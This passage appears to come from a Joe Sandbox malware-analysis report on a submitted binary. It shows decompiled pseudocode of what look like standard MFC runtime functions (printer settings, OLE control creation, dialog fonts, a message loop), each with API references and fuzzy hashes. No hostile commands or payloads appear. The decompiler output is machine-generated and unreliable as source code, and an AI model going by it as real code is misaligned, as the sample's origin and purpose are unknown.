      							E00AC5AED( &_a4, 0);
      							_t39 =  *((intOrPtr*)(_t71 + 4));
      							__eflags = _t39 - 0xffffffff;
      							if(_t39 < 0xffffffff) {
      								_t42 = _t39 + 1;
      								__eflags = _t42;
      								 *((intOrPtr*)(_t71 + 4)) = _t42;
      							}
      							E00AC5B15( &_a4);
      							E00AC5B41(__eflags, _t71);
      						} else {
      							_t71 = _t51;
      						}
      						goto L19;
      					}
      					L6:
      					if( *((char*)(_t33 + 0x14)) == 0) {
      						goto L10;
      					}
      					_t45 = E00AC5BB8();
      					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
      						goto L12;
      					}
      					_t65 =  *((intOrPtr*)(_t45 + 8));
      					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
      					goto L11;
      				}
      			}


      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2CBD
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2CE0
      • std::bad_exception::bad_exception.LIBCMT ref: 009A2D64
      • __CxxThrowException@8.LIBCMT ref: 009A2D72
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2D85
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 009A2D9F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
      • String ID: bad cast
      • API String ID: 2427920155-3145022300
      • Opcode ID: 128808e961abf13e4944d13e9e75c18edaac94563608cf10631c9028ea9a42b1
      • Instruction ID: 9d809325553c8011949b22af50019ad46d9c2317ac267db0e50396061b2fc4f4
      • Opcode Fuzzy Hash: 128808e961abf13e4944d13e9e75c18edaac94563608cf10631c9028ea9a42b1
      • Instruction Fuzzy Hash: 0231F3B1D002049BDB14DF28C981FAEB774EB05720F11465DE826A72D2EB306E40CBE1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009B23A9(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
      				int _t37;
      				int _t38;
      				void* _t39;
      				intOrPtr* _t66;
      				intOrPtr* _t67;
      				intOrPtr* _t68;
      				intOrPtr* _t69;
      				intOrPtr* _t72;
      				intOrPtr* _t73;
      				intOrPtr _t76;
      				void* _t77;
      
      				_t74 = __edi;
      				_push(0x214);
      				E00AAD2D1(0xac825a, __ebx, __edi, __esi);
      				_t76 = __ecx;
      				 *((intOrPtr*)(_t77 - 0x21c)) = __ecx;
      				 *((intOrPtr*)(__ecx)) = 0xad912c;
      				_t66 =  *((intOrPtr*)(__ecx + 0x5c));
      				 *(_t77 - 4) = 0;
      				 *(_t77 - 4) = 1;
      				if(_t66 != 0) {
      					 *((intOrPtr*)( *_t66 + 4))(1);
      				}
      				_t67 =  *((intOrPtr*)(_t76 + 0x8c));
      				if(_t67 != 0) {
      					 *((intOrPtr*)( *_t67 + 0x1c))(1);
      				}
      				_t68 =  *((intOrPtr*)(_t76 + 0x90));
      				_t83 = _t68;
      				if(_t68 != 0) {
      					 *((intOrPtr*)( *_t68 + 4))(1);
      				}
      				if( *((intOrPtr*)(E009BD77F(0, _t74, _t76, _t83) + 0x14)) == 0) {
      					_t72 =  *0xd0fb70; // 0x0
      					if(_t72 != 0) {
      						 *((intOrPtr*)( *_t72 + 4))(1);
      						 *0xd0fb70 = 0;
      					}
      					_t73 =  *0xd0fb6c; // 0x0
      					if(_t73 != 0) {
      						 *((intOrPtr*)( *_t73 + 4))(1);
      						 *0xd0fb6c = 0;
      					}
      				}
      				_t35 =  *((intOrPtr*)(_t76 + 0x74));
      				if( *((intOrPtr*)(_t76 + 0x74)) != 0) {
      					E009BB9E5(_t35);
      				}
      				_t36 =  *((intOrPtr*)(_t76 + 0x78));
      				if( *((intOrPtr*)(_t76 + 0x78)) != 0) {
      					E009BB9E5(_t36);
      				}
      				_t37 =  *(_t76 + 0x98) & 0x0000ffff;
      				if(_t37 != 0) {
      					GlobalDeleteAtom(_t37);
      				}
      				_t38 =  *(_t76 + 0x9a) & 0x0000ffff;
      				if(_t38 != 0) {
      					GlobalDeleteAtom(_t38);
      				}
      				_t69 =  *((intOrPtr*)(_t76 + 0x94));
      				_t91 = _t69;
      				if(_t69 != 0) {
      					 *((intOrPtr*)( *_t69 + 4))(1);
      				}
      				_t39 = E009BD77F(0, _t74, _t76, _t91);
      				if( *((intOrPtr*)(_t39 + 0x10)) ==  *((intOrPtr*)(_t76 + 0x50))) {
      					 *((intOrPtr*)(_t39 + 0x10)) = 0;
      				}
      				if( *((intOrPtr*)(_t39 + 4)) == _t76) {
      					 *((intOrPtr*)(_t39 + 4)) = 0;
      				}
      				E00AAB4AB( *((intOrPtr*)(_t76 + 0x50)));
      				E00AAB4AB( *((intOrPtr*)(_t76 + 0x58)));
      				E00AAB4AB( *((intOrPtr*)(_t76 + 0x64)));
      				E00AAB4AB( *((intOrPtr*)(_t76 + 0x68)));
      				E00AAB4AB( *((intOrPtr*)(_t76 + 0x6c)));
      				 *((intOrPtr*)(_t76 + 0x2c)) = 0;
      				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
      				E009B2B95(0, _t76, _t74, _t76,  *(_t77 - 4));
      				return E00AAD32D(0, _t74, _t76);
      			}


      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
      • String ID:
      • API String ID: 1844215989-0
      • Opcode ID: 72272cf09e45da0b3f3d83d11c0e852da03555cfb0786b65bebacdc0bd0c4944
      • Instruction ID: a6f13d92232007ac66d1fc957628f9fc064cbbb015b5549b887c71d0163125b5
      • Opcode Fuzzy Hash: 72272cf09e45da0b3f3d83d11c0e852da03555cfb0786b65bebacdc0bd0c4944
      • Instruction Fuzzy Hash: F83103705007409FCB24EFB4C695AA977E6FF05314F54886DF19A8BAA2CB75DC41CB50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E009B1A04(void* __ecx, char* _a4) {
      				void* _v8;
      				void* _t15;
      				void* _t20;
      				void* _t35;
      
      				_push(__ecx);
      				_t35 = __ecx;
      				_t15 =  *(__ecx + 0x78);
      				if(_t15 != 0) {
      					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
      					if(_t15 == 0) {
      						_t15 = OpenPrinterA(_a4,  &_v8, 0);
      						if(_t15 != 0) {
      							_t18 =  *(_t35 + 0x74);
      							if( *(_t35 + 0x74) != 0) {
      								E009BB9E5(_t18);
      							}
      							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
      							 *(_t35 + 0x74) = _t20;
      							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
      								E009BB9E5( *(_t35 + 0x74));
      								 *(_t35 + 0x74) = 0;
      							}
      							_t15 = ClosePrinter(_v8);
      						}
      					}
      				}
      				return _t15;
      			}


      APIs
      • GlobalLock.KERNEL32 ref: 009B1A23
      • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,009AE5E5,?), ref: 009B1A2F
      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,009AE5E5,?), ref: 009B1A41
      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,009AE5E5,?), ref: 009B1A61
      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 009B1A69
      • GlobalLock.KERNEL32 ref: 009B1A73
      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,009AE5E5,?), ref: 009B1A80
      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,009AE5E5,?), ref: 009B1A98
        • Part of subcall function 009BB9E5: GlobalFlags.KERNEL32(?), ref: 009BB9F4
        • Part of subcall function 009BB9E5: GlobalUnlock.KERNEL32(?,?,?,?,009B2451,?,00000214,009A47AB), ref: 009BBA05
        • Part of subcall function 009BB9E5: GlobalFree.KERNEL32 ref: 009BBA0F
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
      • String ID:
      • API String ID: 168474834-0
      • Opcode ID: 96b0b232e8413c9911510834969f856ec1122f03cf63e4de027b66c40d6ffae3
      • Instruction ID: c5d01d6d17205f3dbafd3e15fed01f2d8046200ddc8d97b858916d04a2ea0534
      • Opcode Fuzzy Hash: 96b0b232e8413c9911510834969f856ec1122f03cf63e4de027b66c40d6ffae3
      • Instruction Fuzzy Hash: 6C11EC72500A00BBDB22ABA6CE8ADBF7BFDEB85B50B040519F605D2020D731ED81DB20
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 67%
      			E009B5CC3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr* _t146;
      				int _t151;
      				signed int _t155;
      				short* _t156;
      				intOrPtr _t160;
      				signed int _t184;
      				intOrPtr _t185;
      				signed int _t186;
      				intOrPtr _t191;
      				struct tagRECT _t197;
      				int _t198;
      				signed int _t200;
      				signed int _t201;
      				void* _t228;
      				intOrPtr _t232;
      				short _t233;
      				intOrPtr* _t240;
      				signed int* _t242;
      				signed int _t245;
      				signed int* _t246;
      				void* _t247;
      
      				_push(0xa8);
      				E00AAD29B(0xac84c9, __ebx, __edi, __esi);
      				_t240 =  *((intOrPtr*)(_t247 + 0x14));
      				_t242 =  *(_t247 + 0x1c);
      				 *((intOrPtr*)(_t247 - 0x68)) =  *((intOrPtr*)(_t247 + 8));
      				 *(_t247 - 0x7c) =  *(_t247 + 0xc);
      				 *(_t247 - 0x50) =  *(_t247 + 0x18) & 0x0000ffff;
      				 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 + 0x20));
      				 *((intOrPtr*)(_t247 - 0x70)) =  *((intOrPtr*)(_t247 + 0x24));
      				_t146 = _t240 + 0x12;
      				 *((intOrPtr*)(_t247 - 0x58)) = _t146;
      				if( *((intOrPtr*)(_t247 + 0x10)) != 0) {
      					 *((intOrPtr*)(_t247 - 0x24)) =  *((intOrPtr*)(_t240 + 8));
      					 *((intOrPtr*)(_t247 - 0x20)) =  *((intOrPtr*)(_t240 + 4));
      					 *((short*)(_t247 - 0x1c)) =  *((intOrPtr*)(_t240 + 0xc));
      					 *((short*)(_t247 - 0x1a)) =  *((intOrPtr*)(_t240 + 0xe));
      					 *((short*)(_t247 - 0x16)) =  *_t146;
      					_t232 = _t240 + 0x18;
      					 *((short*)(_t247 - 0x18)) =  *(_t240 + 0x10);
      					 *((short*)(_t247 - 0x14)) =  *((intOrPtr*)(_t240 + 0x14));
      					_t240 = _t247 - 0x24;
      					 *((intOrPtr*)(_t247 - 0x58)) = _t232;
      				}
      				_t233 =  *((short*)(_t240 + 0xa));
      				_t197 =  *((short*)(_t240 + 8));
      				 *((intOrPtr*)(_t247 - 0x28)) =  *((short*)(_t240 + 0xe)) + _t233;
      				 *(_t247 - 0x34) = _t197;
      				 *((intOrPtr*)(_t247 - 0x30)) = _t233;
      				 *((intOrPtr*)(_t247 - 0x2c)) =  *((short*)(_t240 + 0xc)) + _t197;
      				_t151 = MapDialogRect( *( *((intOrPtr*)(_t247 - 0x68)) + 0x20), _t247 - 0x34);
      				 *(_t247 - 0x60) =  *(_t247 - 0x60) & 0x00000000;
      				if( *((intOrPtr*)(_t247 - 0x4c)) >= 4) {
      					_t201 =  *_t242;
      					 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 - 0x4c)) - 4;
      					_t242 =  &(_t242[1]);
      					if(_t201 != 0) {
      						__imp__#4(_t242, _t201);
      						_t242 = _t242 + _t201 * 2;
      						 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 - 0x4c)) - _t201 + _t201;
      						 *(_t247 - 0x60) = _t151;
      					}
      				}
      				 *(_t247 - 0x64) =  *(_t247 - 0x64) & 0x00000000;
      				E009A5D70(_t247 - 0x5c, _t233, E009B9D52());
      				 *((intOrPtr*)(_t247 - 4)) = 0;
      				 *(_t247 - 0x78) = 0;
      				 *(_t247 - 0x6c) = 0;
      				 *(_t247 - 0x74) = 0;
      				if( *(_t247 - 0x50) == 0x37a ||  *(_t247 - 0x50) == 0x37b) {
      					_t155 =  *_t242;
      					_t61 = _t155 - 0xc; // 0x36f
      					_t233 = _t61;
      					_t242 =  &(_t242[3]);
      					 *(_t247 - 0x80) = _t155;
      					 *((intOrPtr*)(_t247 - 0x54)) = _t233;
      					if(_t233 <= 0) {
      						L16:
      						 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 - 0x4c)) - _t155;
      						 *(_t247 - 0x50) =  *(_t247 - 0x50) + 0xfffc;
      						goto L17;
      					} else {
      						goto L8;
      					}
      					do {
      						L8:
      						_t184 =  *_t242;
      						_t200 = _t242[1] & 0x0000ffff;
      						 *((intOrPtr*)(_t247 - 0x54)) =  *((intOrPtr*)(_t247 - 0x54)) - 6;
      						_t242 =  &(_t242[1]);
      						 *(_t247 - 0x84) = _t184;
      						if(_t184 != 0x80010001) {
      							_t185 = E009A6291(__eflags, 0x1c);
      							 *((intOrPtr*)(_t247 - 0x88)) = _t185;
      							 *((char*)(_t247 - 4)) = 1;
      							__eflags = _t185;
      							if(_t185 == 0) {
      								_t186 = 0;
      								__eflags = 0;
      							} else {
      								_t186 = E009CC7DA(_t185,  *(_t247 - 0x64),  *(_t247 - 0x84), _t200);
      							}
      							 *((char*)(_t247 - 4)) = 0;
      							 *(_t247 - 0x64) = _t186;
      						} else {
      							 *(_t247 - 0x6c) =  *_t242;
      							_t246 =  &(_t242[4]);
      							 *(_t247 - 0x74) = _t242[1];
      							E009A6000(_t233, _t240, _t246);
      							_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x5c)) - 0xc));
      							_t228 = 0xffffffef;
      							 *((intOrPtr*)(_t247 - 0x54)) =  *((intOrPtr*)(_t247 - 0x54)) + _t228 - _t191;
      							_t242 = _t246 + _t191 + 1;
      							 *(_t247 - 0x78) = _t200;
      						}
      					} while ( *((intOrPtr*)(_t247 - 0x54)) > 0);
      					_t155 =  *(_t247 - 0x80);
      					goto L16;
      				} else {
      					L17:
      					_t156 =  *((intOrPtr*)(_t247 - 0x58));
      					_t260 =  *_t156 - 0x7b;
      					_push(_t247 - 0x44);
      					_push(_t156);
      					if( *_t156 != 0x7b) {
      						__imp__CLSIDFromProgID();
      					} else {
      						__imp__CLSIDFromString();
      					}
      					_t198 = 0;
      					_push(0);
      					_push( *((intOrPtr*)(_t247 - 0x4c)));
      					_push(_t242);
      					 *((intOrPtr*)(_t247 - 0x58)) = _t156;
      					E009D20D3(0, _t247 - 0xb4, _t240, _t242, _t260);
      					asm("sbb esi, esi");
      					_t245 =  ~( *(_t247 - 0x50) - 0x00000378 & 0x0000ffff) & _t247 - 0x000000b4;
      					 *((char*)(_t247 - 4)) = 2;
      					 *((intOrPtr*)(_t247 - 0x48)) = 0;
      					_t261 =  *((intOrPtr*)(_t247 - 0x58));
      					if( *((intOrPtr*)(_t247 - 0x58)) >= 0) {
      						_push(1);
      						if(E009CA44E(0,  *((intOrPtr*)(_t247 - 0x68)), _t233, _t240, _t245, _t261) != 0 && E009CA9CE( *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x68)) + 0x68)),  *(_t247 - 0x50) - 0x377, 0, _t247 - 0x44, 0,  *_t240, _t247 - 0x34,  *(_t240 + 0x10) & 0x0000ffff, _t245, 0 |  *(_t247 - 0x50) == 0x00000377,  *(_t247 - 0x60), _t247 - 0x48) != 0) {
      							E009CBC84( *((intOrPtr*)(_t247 - 0x48)), 1);
      							SetWindowPos( *( *((intOrPtr*)(_t247 - 0x48)) + 0x24),  *(_t247 - 0x7c), 0, 0, 0, 0, 0x13);
      							 *( *((intOrPtr*)(_t247 - 0x48)) + 0x94) =  *(_t247 - 0x64);
      							E009B2357(0,  *((intOrPtr*)(_t247 - 0x48)) + 0xa4, _t247 - 0x5c);
      							 *((short*)( *((intOrPtr*)(_t247 - 0x48)) + 0x98)) =  *(_t247 - 0x78);
      							 *( *((intOrPtr*)(_t247 - 0x48)) + 0x9c) =  *(_t247 - 0x6c);
      							 *( *((intOrPtr*)(_t247 - 0x48)) + 0xa0) =  *(_t247 - 0x74);
      						}
      					}
      					if( *(_t247 - 0x60) != _t198) {
      						__imp__#6( *(_t247 - 0x60));
      					}
      					_t160 =  *((intOrPtr*)(_t247 - 0x48));
      					if(_t160 == _t198) {
      						 *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x70)))) = _t198;
      					} else {
      						 *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x70)))) =  *((intOrPtr*)(_t160 + 0x24));
      						_t198 = 1;
      					}
      					 *((char*)(_t247 - 4)) = 0;
      					E009D2457(_t198, _t247 - 0xb4, _t233, _t240, _t245, 1);
      					E009A5510( *((intOrPtr*)(_t247 - 0x5c)) + 0xfffffff0, _t233);
      					return E00AAD31E(_t198, _t240, _t245);
      				}
      			}


      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009B5CCD
      • MapDialogRect.USER32(?,?), ref: 009B5D6B
      • SysAllocStringLen.OLEAUT32(?,?), ref: 009B5D8A
      • CLSIDFromString.OLE32(?,?,00000000), ref: 009B5E88
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • CLSIDFromProgID.OLE32(?,?,00000000), ref: 009B5E90
      • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,00000000,?,00000000), ref: 009B5F38
      • SysFreeString.OLEAUT32(00000000), ref: 009B5F8A
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: String$From$AllocDialogFreeH_prolog3_ProgRectWindow_malloc
      • String ID:
      • API String ID: 2980224915-0
      • Opcode ID: 4096b86483742858d29c723d91a22883b3c2ab8c644bbf64cea64eebf93240c7
      • Instruction ID: f2d320726a6b589f9c6e98b1b04c5f609c4c45c62fdba20c9b86ccbbd876eec0
      • Opcode Fuzzy Hash: 4096b86483742858d29c723d91a22883b3c2ab8c644bbf64cea64eebf93240c7
      • Instruction Fuzzy Hash: 4AB11470D00619DFCB14DFA8C984AEDBBB8FF08314F11412AE81AAB251E774AA85CF51
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E009C94FB(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
      				signed int _v8;
      				short _v72;
      				char* _v76;
      				signed int _v80;
      				signed int* _v84;
      				signed int _v88;
      				intOrPtr _v92;
      				void* __edi;
      				signed int _t55;
      				void* _t65;
      				char* _t69;
      				short* _t70;
      				signed int _t72;
      				signed int* _t83;
      				short* _t84;
      				void* _t93;
      				signed int* _t101;
      				signed int _t102;
      				void** _t103;
      				intOrPtr _t105;
      				signed int _t107;
      				signed int _t109;
      				void* _t110;
      
      				_t104 = __esi;
      				_t99 = __edx;
      				_t82 = __ebx;
      				_t55 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t55 ^ _t109;
      				_t103 = __ecx;
      				_v76 = _a4;
      				if(__ecx[1] != 0) {
      					_push(__ebx);
      					_push(__esi);
      					_t83 = GlobalLock( *__ecx);
      					_v84 = _t83;
      					_v88 = 0 | _t83[0] == 0x0000ffff;
      					_v80 = E009C9345(_t83);
      					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
      					_v92 = _t105;
      					if(_v88 == 0) {
      						 *_t83 =  *_t83 | 0x00000040;
      					} else {
      						_t83[3] = _t83[3] | 0x00000040;
      					}
      					if(lstrlenA(_v76) >= 0x20) {
      						L15:
      						_t65 = 0;
      					} else {
      						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
      						_v76 = _t69;
      						if(_t69 < _t105) {
      							goto L15;
      						} else {
      							_t70 = E009C9378(_t83);
      							_t93 = 0;
      							_t84 = _t70;
      							if(_v80 != 0) {
      								_t30 = E00AAF260(_t84 + _t105) * 2; // 0x76c46af2
      								_t93 = _t105 + _t30 + 2;
      							}
      							_t34 =  &(_v76[3]); // 0x3
      							_t101 = _v84;
      							_t37 = _t84 + 3; // 0x76c46af5
      							_t72 = _t93 + _t37 & 0xfffffffc;
      							_t107 = _t84 + _t34 & 0xfffffffc;
      							_v80 = _t72;
      							if(_v88 == 0) {
      								_t102 =  *(_t101 + 8) & 0x0000ffff;
      							} else {
      								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
      							}
      							if(_v76 == _t93 || _t102 == 0) {
      								L17:
      								 *_t84 = _a8;
      								_t99 =  &_v72;
      								E009BBE9E(_t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
      								_t103[1] = _t103[1] + _t107 - _v80;
      								GlobalUnlock( *_t103);
      								_t103[2] = _t103[2] & 0x00000000;
      								_t65 = 1;
      							} else {
      								_t99 = _t103[1];
      								_t97 = _t99 - _t72 + _v84;
      								if(_t99 - _t72 + _v84 <= _t99) {
      									E009BBE9E(_t107, _t97, _t72, _t97);
      									_t110 = _t110 + 0x10;
      									goto L17;
      								} else {
      									goto L15;
      								}
      							}
      						}
      					}
      					_pop(_t104);
      					_pop(_t82);
      				} else {
      					_t65 = 0;
      				}
      				return E00AAB46A(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
      			}


      APIs
      • GlobalLock.KERNEL32 ref: 009C9527
      • lstrlenA.KERNEL32(?), ref: 009C9571
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 009C958B
      • _wcslen.LIBCMT ref: 009C95AF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
      • String ID: System
      • API String ID: 4253822919-3470857405
      • Opcode ID: fe877c25654737ddb294b95d60a938703e69b218524a6dd1d565382331d30a28
      • Instruction ID: 2a2b41aeb0fdb57ff761ad80ced6d7d074369bf475177e4c9640484bffd29b2f
      • Opcode Fuzzy Hash: fe877c25654737ddb294b95d60a938703e69b218524a6dd1d565382331d30a28
      • Instruction Fuzzy Hash: C841AF71D002199FCF14DFA4C989BADBBB8FF04310F14852EE816EB295DB749946CB51
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E009AC4CD(intOrPtr* __ecx, void* __edx, signed int _a4) {
      				int _v8;
      				int _v12;
      				int _v16;
      				struct tagMSG* _v20;
      				struct HWND__* _v24;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				struct HWND__* _t48;
      				struct tagMSG* _t49;
      				signed int _t51;
      				void* _t54;
      				void* _t56;
      				int _t59;
      				long _t62;
      				signed int _t66;
      				void* _t69;
      				intOrPtr* _t71;
      				void* _t73;
      				intOrPtr* _t75;
      
      				_t73 = __edx;
      				_t70 = __ecx;
      				_t75 = __ecx;
      				_v16 = 1;
      				_v12 = 0;
      				if((_a4 & 0x00000004) == 0) {
      					L2:
      					_v8 = 0;
      					L3:
      					_t48 = GetParent( *(_t75 + 0x20));
      					 *(_t75 + 0x58) =  *(_t75 + 0x58) | 0x00000018;
      					_v24 = _t48;
      					_t49 = E009B2B0C(_t77);
      					_t69 = UpdateWindow;
      					_v20 = _t49;
      					while(1) {
      						_t78 = _v16;
      						if(_v16 == 0) {
      							goto L15;
      						}
      						while(1) {
      							L15:
      							_t51 = E009B2F38(_t70, _t73, 0, _t75, _t78);
      							if(_t51 == 0) {
      								break;
      							}
      							if(_v8 != 0) {
      								_t59 = _v20->message;
      								if(_t59 == 0x118 || _t59 == 0x104) {
      									E009B0BD1(_t75, 1);
      									UpdateWindow( *(_t75 + 0x20));
      									_v8 = 0;
      								}
      							}
      							_t71 = _t75;
      							_t54 =  *((intOrPtr*)( *_t75 + 0x88))();
      							_t83 = _t54;
      							if(_t54 == 0) {
